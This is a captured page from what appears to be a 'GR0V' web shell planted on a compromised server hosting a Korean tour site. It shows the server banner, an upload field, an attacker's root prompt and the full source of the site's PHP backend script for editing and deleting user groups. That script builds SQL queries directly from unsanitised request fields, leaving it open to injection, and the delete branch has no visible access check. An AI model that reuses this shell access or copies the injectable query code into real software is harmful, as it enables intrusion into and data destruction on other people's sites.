? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html/backend/modules/users/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html/backend/modules/users/edit_group_do.php

<?
session_start();
require_once('../../../config.php');
require_once('../../../libs/MySql.php');
$db=new MySql;
function edit_category($name,$detail,$cat_id){
	global $db,$user_login;
	if($db->check_data_edit('usertype','usertype_name',$name,'usertype_id',$cat_id)==''){
	if($name!=""&&$detail!=""){
	$result=$db->Query("UPDATE usertype set usertype_name='$name',usertype_level='$detail' where usertype_id='$cat_id'");
if($result){
	$db->Query("DELETE FROM modules WHERE usertype_access_id='$cat_id'");
	if($_POST['checkbox']!=''){
					foreach($_POST['checkbox'] as $k=>$v){
						$db->Query("INSERT INTO modules (module_name,usertype_access_id) value ('$v','$cat_id')");
					}//end foreach
			}
	echo"
	<center><br>บันทึกข้อมูลสำเร็จ</center>
<script language=\"JavaScript\">
        window.parent.frames[0].location = \"list_group.php\";
    </script>
	<meta http-equiv=\"refresh\" content=\"1;url=com_edit_category.php?group_id=$cat_id\">";
}else{
		$error="ไม่สามารถแก้ไขข้อมูลได้";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}else{
	//else check ข้อมูลครบหรือไม่
		$error="ไม่สามารถแก้ไขข้อมูลได้";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}// จบการตรวจสอบข้อมูลว่าครบไหม
	}else{
// จบตรวจสอบว่าชื่อซ้ำกันหรือไม
		$error="ชื่อหมวดหมู่มีในฐานข้อมูลแล้ว";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
	}// จบตรวจสอบว่าชื่อซ้ำกันหรือไม่
}//end edit_category
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE><?echo $cfg['site_name'];?></TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<META content="" name=Keywords>
<META content="<?echo $cfg['site_name'];?>" name="Description">
<META content="<?echo $cfg['site_name'];?>" name="Author">
<META content="<?echo $cfg['site_name'];?>" name="Copyright">
<LINK href="../../css/backend_style2.css" type="text/css" rel="stylesheet">
<?
if($_GET['ac']=='del'){
$cat_id=$_GET['group_id'];
$numrow=$db->check_data('users','user_type',$cat_id);
$chk_parent=$db->check_data('usertype','usertype_parent',$cat_id);
if($chk_parent!=0){
$error="ไม่สามารถลบข้อมูลได้ เนื่องจากหมวดหมู่นี้ยังมี หมวดหมู่ย่อยใช้งานอยู่ค่ะ";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
if($numrow==''){
 $result=$db->Query("DELETE FROM usertype WHERE  usertype_id='$cat_id'");
	if($result){
		$db->Query("DELETE FROM modules WHERE usertype_access_id='$cat_id'");
		echo"
	<center><br>ลบข้อมูลสำเร็จ</center>
<script language=\"JavaScript\">
        window.parent.frames[0].location = \"list_group.php\";
    </script>
	<meta http-equiv=\"refresh\" content=\"1;url=add_new_group.php\">";
}else{
	$error="ไม่สามารถลบข้อมูลได้";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}else{
$error="ไม่สามารถลบข้อมูลได้ เนื่องจากหมวดหมู่นี้ยังมี Userใช้งาน อยู่ในฐานข้อมูล กรุณาลบ User ก่อนค่ะ";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}//จบการตรวจสอบว่ามีข้อมูลหัวข้ออยู่ในฐานข้อมูลหรือไม
}else{
edit_category($_POST['name'],$_POST['detail'],$_POST['group_id']);
}
?>

T1KUS90T
  root-grov@210.1.60.28:~$